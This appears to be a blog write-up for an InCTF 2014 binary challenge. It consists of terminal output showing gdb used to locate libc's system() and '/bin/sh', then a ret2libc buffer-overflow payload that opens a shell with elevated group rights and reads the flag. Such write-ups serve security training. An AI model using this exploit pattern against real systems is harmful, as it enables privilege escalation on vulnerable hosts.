Thursday, March 6, 2014

InCTF 2014 Bin8 WriteUp


challenge8@inctf:~$ ldd challenge8
 linux-gate.so.1 =>  (0xf7ffd000)
 libc.so.6 => /lib32/libc.so.6 (0xf7e4e000)
 /lib/ld-linux.so.2 (0x56555000)
challenge8@inctf:~$ gdb challenge8
Reading symbols from /home/challenge8/challenge8...done.
(gdb) break main
Reading in symbols for /home/challenge8/challenge8.c...done.
Breakpoint 1 at 0x80484ab: file /home/challenge8/challenge8.c, line 17.
(gdb) r
Starting program: /home/challenge8/challenge8
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from system-supplied DSO at 0xf7fdb000...(no debugging symbols found)...done.
Reading symbols from /lib32/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib32/libc.so.6

Breakpoint 1, main (argc=1, argv=0xffffd6f4) at /home/challenge8/challenge8.c:17
17 /home/challenge8/challenge8.c: No such file or directory.
(gdb) x system
0xf7e6b250 : 0x891cec83
(gdb) find 0xf7e4e000,  0xffffffff,  "/bin/sh"
0xf7f8aa2c
warning: Unable to access target memory at 0xf7fd0f34, halting search.
1 pattern found.
(gdb) x/s 0xf7f8aa2c
0xf7f8aa2c:  "/bin/sh"
(gdb) quit
A debugging session is active.

 Inferior 1 [process 790] will be killed.

Quit anyway? (y or n) y
challenge8@inctf:~$ id
uid=1016(challenge8) gid=1016(challenge8) groups=1016(challenge8),1001(ctf)
challenge8@inctf:~$ ./challenge8 `python -c 'print "A" * 76+ "\x50\xb2\xe6\xf7" + "AAAA" + "\x2c\xaa\xf8\xf7"'`
This is the content of buffer: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP���AAAA,��
$ id
uid=1016(challenge8) gid=1016(challenge8) egid=1017(flag8) groups=1016(challenge8),1001(ctf)
$ cat /home/flag8/flag8
v6rjR2kw3adHwbh4
$